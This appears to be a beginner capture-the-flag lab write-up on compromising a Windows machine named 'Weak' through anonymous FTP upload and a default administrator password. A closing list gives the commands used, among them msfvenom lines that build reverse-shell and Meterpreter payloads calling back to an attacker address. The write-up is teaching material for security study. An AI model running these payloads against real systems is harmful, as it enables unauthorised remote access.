Premise

In this walk-through, we demonstrated basic and easy privilege escalation on a Windows server system through a weak admin username and password. We gained access through a mis-configured permissions on the FTP server.

Machine Name: Weak

Difficulty: Beginner

Skills Learned

  • Windows privilege escalation
  • FTP exploitation
  • Default Passwords

Getting a Foothold

I started by scanning the machine to see what services were running. I found an FTP server that allowed anonymous login and a web server. I quickly realized that the FTP server was hosting the files for the web server, which meant that if I could upload a file to the FTP server, I could access it through the web browser. This was my way in!

My first plan was to create a malicious ASPX file (a type of web page that can run code on the server) using Metasploit and upload it to the FTP server. I did this, and when I accessed the file through the web browser, I got a basic shell on the machine.

Trying to Upgrade My Shell

The basic shell was a good start, but I wanted something more powerful, like a Meterpreter shell. I tried to create and upload a couple of different Meterpreter payloads, but I kept running into issues. It seemed like the machine was not compatible with the payloads I was creating.

Finding the Golden Ticket

Since my Meterpreter plan wasn’t working, I decided to go back to my basic shell and see what I could find. I started looking around the file system and found a “development” directory. Inside this directory, there was a readme.txt file. I opened it up, and to my surprise, it contained a message that said, “for the level of god change your password.”

I had a hunch that this was a hint for the administrator’s password. I tried to log in as “administrator” with the password “password,” and it worked! I was now the administrator of the machine. 🥳

Commands I Used

Here are some of the key commands I used during this process:

  • Connecting to the FTP server: ftp 172.31.1.11
  • Generating an ASPX payload: msfvenom -p windows/shell/reverse_tcp LHOST=172.31.1.24 LPORT=4545 -f aspx > shell.aspx
  • Generating a Meterpreter payload: msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.31.1.24 LPORT=4546 -f exe > is.exe
  • Uploading a file to the FTP server: put is.exe
  • Checking my privileges: whoami /priv
  • Reading the readme.txt file: type readme.txt
  • Logging in as the administrator: psexec.py administrator@172.31.1.11

Video Walk-through

Show Comments

The MasterMinds Notes

About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by, Motasem Hamdan, who is a Cybersecurity content creator and YouTuber.

View Articles